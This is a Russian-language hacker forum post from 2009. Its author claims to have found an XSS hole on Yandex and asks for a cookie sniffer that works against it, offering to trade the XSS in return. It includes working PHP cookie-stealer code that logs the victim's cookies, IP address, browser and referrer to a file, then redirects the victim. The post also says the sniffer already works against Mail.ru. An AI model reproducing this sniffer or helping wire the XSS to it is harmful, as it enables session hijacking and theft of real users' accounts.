| satana-fu |
26.09.2009 21:41 |
Активная xss на Яндекс
нашел полуактивную xss на яндекс. Пытаюсь подставить сниффер, не получается, вернее при запросе (document.cookie) все кукисы выдаются, а при замене запроса на сниффер, кукисы на сниффер не приходят.
Готов поделиться xss с тем, кто подскажет работающий сниффер для яндекса (поделюсь xss после проверки снифа), использовал стандартный от Kaniq и этот сниф, но кукисы не пришли
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING"));
$Date = date("d-m-y H:i:s", time());
$browser = getenv("HTTP_USER_AGENT");
$ref = getenv("HTTP_REFERER");
$ip = getenv("REMOTE_ADDR");
$text = "
$Cookies:
$Date:
$browser:
$ref:
$ip:
$query";
$filelog = fopen("base.php","a+");
fwrite($filelog,"\n $text \n");
fclose($filelog);
header('Location: http://somesite.ru');
?>
На майле сниффер работает, на яндексе не работает. :rolleyes:
Подсказка сниффера тут, помощь в реализации в аську. |
